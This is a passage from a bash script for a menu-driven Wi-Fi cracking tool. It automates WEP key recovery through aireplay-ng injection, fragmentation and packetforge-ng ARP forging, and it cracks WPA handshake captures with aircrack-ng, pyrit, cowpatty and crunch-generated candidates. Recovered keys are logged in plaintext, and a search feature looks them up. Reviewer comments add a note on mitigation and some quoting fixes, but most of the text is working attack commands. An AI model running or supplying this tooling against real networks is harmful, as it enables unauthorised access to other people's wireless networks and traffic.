        xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
        xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
        echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
        echo "Please wait for aircrack to start...$STAND"
        sleep 60
        aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
        sleep 2
        # If aircrack-ng wrote no key file, cat fails and passkey stays empty.
        passkey=$(cat WEPpasskey.txt)
        sleep 2
        # pidof returns every xterm on the machine, not only the three started above.
        kill `pidof xterm`
        echo ""
        echo $RED"Target essid$STAND: $AP_essid"
        echo $RED"Target bssid$STAND: $AP_bssid"
        echo $RED"Target Pass-Key$STAND: $passkey"

        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
        read -e CONFIRM
        case $CONFIRM in
          y|Y|YES|yes|Yes)
            break ;;
          *) echo $RED"Please re-enter information$STAND" ;;
        esac
      done

      # Append the result as a four-line plaintext record.
      echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
      echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
      echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
      echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
      cd
    fi
    if [[ $answer == "n" || $answer == "N" ]]; then
      while true
      do

        echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
        # $! is the PID of the background xterm wrapping airodump-ng.
        xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
        sleep 2
        # The next steps run in the foreground and use $mon0mac, which is set near
        # the top of the script from `ip addr`, as the source address.
        aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
        sleep 2
        aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
        sleep 2
        # Builds the file arp-packet from whatever *.xor file the previous step left.
        packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
        sleep 2
        xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
        sleep 2

        echo ""
        echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
        read option

        # Only a lowercase "y" is accepted here.
        if [[ $option == "y" ]]; then
          aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
          passkey=$(cat WEPpasskey.txt)
          rm WEPpasskey.txt
          kill ${AIRODUMPPID}
          kill ${AIREPLAYPID}
          rm *.ivs
          rm *.cap
          rm *.xor
          rm arp-packet
          # The record is written whether or not a key was actually read.
          echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
          echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
          echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
          echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
        fi

        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
        read -e CONFIRM
        case $CONFIRM in
          y|Y|YES|yes|Yes)
            break ;;
          *) echo ""
        esac
      done
    fi
    cd
    ;;
  2653.  
  2654. ###### [6] Attack Handshake.cap Files ######
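  6)
    # Menu option 6: offline guessing against an existing handshake capture file.
    # Options 1-3 feed a wordlist file to aircrack-ng, pyrit, or pyrit piped into
    # cowpatty; options 4-6 generate candidates with crunch and pipe them into the
    # same tools. Each option prompts for its inputs, echoes the command line it
    # is about to run, waits for Enter and then runs it. Nothing in this arm
    # refers to the mon0 interface.
    #
    # Defensive reading: success depends on the passphrase being in the wordlist
    # or in the generated keyspace, so a long random passphrase (or WPA3-SAE) is
    # the mitigation.
    #
    # NOTE(review): the typed values are expanded unquoted into the command lines,
    # so whitespace splits a value into several arguments, glob characters are
    # expanded by the shell and a value starting with '-' is read as an option.
    # $OptionalCrunchOptions relies on that splitting to pass several crunch options.
    clear
    echo $RED"###################################"
    echo "# #"
    echo "# With a wordlist #"
    echo "# $GREEN[1]$BLUE = Aircrack-ng $RED#"
    echo "# $GREEN[2]$BLUE = Pyrit $RED#"
    echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty $RED#"
    echo "# #"
    echo "# Without a wordlist #"
    echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng $RED#"
    echo "# $GREEN[5]$BLUE = Crunch + Pyrit $RED#"
    echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
    echo "# #"
    echo "###################################"
    echo
    echo $GREEN"Choose an option?"$STAND
    read option
    # [1] wordlist + aircrack-ng
    if [[ $option == "1" ]]; then
      clear
      echo $RED
      echo "############################################"
      echo "# #"
      echo "#$STAND Attack Capture File Using A Wordlist $RED#"
      echo "#$STAND (Aircrack-ng) $RED#"
      echo "# #"
      echo "############################################"
      echo
      echo $RED"eg: /root/Desktop/sky12345.cap"
      read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
      echo
      echo $RED"eg: /root/Desktop/wordlist.txt"
      read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
      clear
      # Chosen user input options
      ############################
      echo
      echo $RED"You've chosen:"
      echo "=============="
      echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
      echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
      echo
      echo $RED"Commands to launch:"
      echo "==================="
      echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
      echo
      # Launch chosen commands/options
      #################################
      read -p $GREEN"Press enter to start"$STAND
      clear
      aircrack-ng -w $WordlistNameLocation $CapNameLocation
    fi
    # [2] wordlist + pyrit, selecting the network by bssid
    if [[ $option == "2" ]]; then
      clear
      echo $RED
      echo "############################################"
      echo "# #"
      echo "#$STAND Attack Capture File Using A Wordlist $RED#"
      echo "#$STAND (Pyrit) $RED#"
      echo "# #"
      echo "############################################"
      echo
      echo $RED"eg: 00:11:22:33:44:55"
      read -p $GREEN"Access Point bssid$STAND: " bssid
      echo
      echo $RED"eg: /root/Desktop/sky12345.cap"
      read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
      echo
      echo $RED"eg: /root/Desktop/wordlist.txt"
      read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
      clear
      # Chosen user input options
      ############################
      echo
      echo $RED"You've chosen:"
      echo "=============="
      echo $RED"Access Point bssid$STAND: $bssid"
      echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
      echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
      echo
      echo $RED"Commands to launch:"
      echo "==================="
      echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
      echo
      # Launch chosen commands/options
      #################################
      read -p $GREEN"Press enter to start"$STAND
      clear
      pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
    fi
    # [3] wordlist piped through pyrit into cowpatty, selecting the network by essid
    if [[ $option == "3" ]]; then
      clear
      echo $RED
      echo "############################################################################"
      echo "# #"
      echo "#$STAND Attack Capture File Using A Wordlist $RED#"
      echo "#$STAND (Pyrit + Cowpatty) $RED#"
      echo "# #"
      echo "############################################################################"$STAND
      echo
      echo $RED"eg: sky12345"
      read -p $GREEN"Access Point essid$STAND: " essid
      echo
      echo $RED"eg: /root/Desktop/sky12345.cap"
      read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
      echo
      echo $RED"eg: /root/Desktop/wordlist.txt"
      read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
      clear
      # Chosen user input options
      ############################
      echo
      echo $RED"You've chosen:"
      echo "=============="
      echo $RED"Access Point essid$STAND: $essid"
      echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
      echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
      echo
      echo $RED"Commands to launch:"
      echo "==================="
      echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
      echo
      # Launch chosen commands/options
      #################################
      read -p $GREEN"Press enter to start"$STAND
      clear
      cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
    fi
    # [4] crunch-generated candidates piped into aircrack-ng
    if [[ $option == "4" ]]; then
      # Fixed: this line read `lear`, which only produced a command-not-found
      # error and left the previous screen contents in place.
      clear
      echo $RED
      echo "############################################################################"
      echo "# #"
      echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
      echo "#$STAND (Crunch + Aircrack-ng) $RED#"
      echo "# #"
      echo "############################################################################"$STAND
      echo
      echo $RED"eg: abcdef23456789"
      read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
      echo
      echo $RED"eg: 10"
      read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
      echo
      echo $RED"eg: 10"
      read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
      echo
      echo $RED"eg:"
      echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
      echo $RED"-s XXXXXXXXXX = Start point."
      read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
      echo
      echo $RED"eg: sky12345"
      read -p $GREEN"Access Point essid$STAND: " essid
      echo
      echo $RED"eg: /root/Desktop/sky12345.cap"
      read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
      clear
      # Chosen user input options
      ############################
      echo
      echo $RED"You've chosen:"
      echo "=============="
      echo $RED"Minimum length password$STAND: $PasswordLengthMin"
      echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
      echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
      echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
      echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
      echo $RED"essid$STAND: $essid"
      echo
      echo $RED"Commands to launch:"
      echo "==================="
      echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
      echo
      # Launch chosen commands/options
      #################################
      read -p $GREEN"Press enter to start"$STAND
      clear
      crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
    fi
    # [5] crunch-generated candidates piped into pyrit
    if [[ $option == "5" ]]; then
      clear
      echo $RED
      echo "############################################################################"
      echo "# #"
      echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
      echo "#$STAND (Crunch + Pyrit) $RED#"
      echo "# #"
      echo "############################################################################"$STAND
      echo
      echo $RED"eg: abcdef23456789"
      read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
      echo
      echo $RED"eg: 10"
      read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
      echo
      echo $RED"eg: 10"
      read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
      echo
      echo $RED"eg:"
      echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
      echo $RED"-s XXXXXXXXXX = Start point."
      read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
      echo
      echo $RED"eg: sky12345"
      read -p $GREEN"Access Point essid$STAND: " essid
      echo
      echo $RED"eg: /root/Desktop/sky12345.cap"
      read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
      clear
      # Chosen user input options
      ############################
      echo
      echo $RED"You've chosen:"
      echo "=============="
      echo $RED"Minimum length password$STAND: $PasswordLengthMin"
      echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
      echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
      echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
      echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
      echo $RED"essid$STAND: $essid"
      echo
      echo $RED"Commands to launch:"
      echo "==================="
      echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
      echo
      # Launch chosen commands/options
      #################################
      read -p $GREEN"Press enter to start"$STAND
      clear
      crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
    fi
    # [6] crunch-generated candidates piped through pyrit into cowpatty
    if [[ $option == "6" ]]; then
      clear
      echo $RED
      echo "############################################################################"
      echo "# #"
      echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
      echo "#$STAND (Crunch + Pyrit + Cowpatty) $RED#"
      echo "# #"
      echo "############################################################################"$STAND
      echo
      echo $RED"eg: abcdef23456789"
      read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
      echo
      echo $RED"eg: 10"
      read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
      echo
      echo $RED"eg: 10"
      read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
      echo
      echo $RED"eg:"
      echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
      echo $RED"-s XXXXXXXXXX = Start point."
      read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
      echo
      echo $RED"eg: sky12345"
      read -p $GREEN"Access Point essid$STAND: " essid
      echo
      echo $RED"eg: /root/Desktop/sky12345.cap"
      read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
      clear
      # Chosen user input options
      ############################
      echo
      echo $RED"You've chosen:"
      echo "=============="
      echo $RED"Minimum length password$STAND: $PasswordLengthMin"
      echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
      echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
      echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
      echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
      echo $RED"essid$STAND: $essid"
      echo
      echo $RED"Commands to launch:"
      echo "==================="
      echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
      echo
      # Launch chosen commands/options
      #################################
      read -p $GREEN"Press enter to start"$STAND
      clear
      crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
    fi
    ;;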
  7)
    ###########################
    # Show Recovered Passkeys #
    ###########################
    # Opens the passkey log with gnome-open, i.e. in whatever application the
    # desktop associates with the file.
    # NOTE(review): the log holds recovered keys as plaintext and nothing visible
    # here restricts its permissions; confirm how the file is created and consider
    # a restrictive mode on $HOME/scrypta.
    gnome-open $HOME/scrypta/Recovered-WPA-Passkeys.txt
    ;;
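  8)
    ##############################################################################
    # Check In Recovered-WPA-Passkeys.txt To See If You Already Have The Passkey #
    ##############################################################################
    ###################
    # Passkey Checker #
    ###################
    # Searches $HOME/scrypta/Recovered-WPA-Passkeys.txt by bssid or essid and
    # prints the lines around each match. The context widths (-B 1 -A 2 for a
    # bssid, -A 3 for an essid) fit a four-line record of essid, bssid, passkey
    # and a separator line.
    #
    # The search term is quoted and preceded by `--`, so a term that is empty,
    # contains spaces or starts with '-' is no longer split into extra arguments or
    # parsed as a grep option. An empty term is rejected: unquoted it made grep
    # take the file name as the pattern and wait on standard input, and quoted it
    # would match every line of the passkey file.
    clear
    echo $RED"How would you like to search."
    echo $GREEN"[1]$BLUE = Search using the bssid."
    echo $GREEN"[2]$BLUE = Search using the essid."
    echo $GREEN"[0]$BLUE = Return To Previous Menu."
    echo $GREEN"1, 2 or 0?"$STAND
    read option

    if [[ $option == "1" ]]; then
      while true
      do
        echo -n $GREEN"Please input the bssid of the access point you would like to check for?$STAND: "
        # -r keeps backslashes in the typed pattern as typed.
        read -r -e SEARCHbssid
        if [[ -n $SEARCHbssid ]]; then
          grep -B 1 -A 2 -- "$SEARCHbssid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
        else
          echo "No search term entered."
        fi
        echo
        echo -n "Would you like to search again? (y or n): "
        read -e CONFIRM
        case $CONFIRM in
          n|N|NO|no|No)
            break ;;
          *) echo ""
        esac
      done
    fi
    if [[ $option == "2" ]]; then
      while true
      do
        echo -n $GREEN"Please input the essid of the access point you would like to check for?$STAND: "
        read -r -e SEARCHessid
        if [[ -n $SEARCHessid ]]; then
          grep -A 3 -- "$SEARCHessid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
        else
          echo "No search term entered."
        fi
        echo
        echo -n "Would you like to search again? (y or n): "
        read -e CONFIRM
        case $CONFIRM in
          n|N|NO|no|No)
            break ;;
          *) echo ""
        esac
      done
    fi
    if [[ $option == "0" ]]; then
      echo "Returning To Menu"
    fi
    ;;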
  # 0 ends the script with a success status.
  0)
    exit 0
    ;;
  # Any other choice: report it and wait for Enter; the enclosing loop then shows
  # the menu again.
  *)
    echo "You've chosen an invalid option, please choose again"
    echo "Press [Enter] to continue. . ."
    read
    ;;
  3000. esac
  3001. done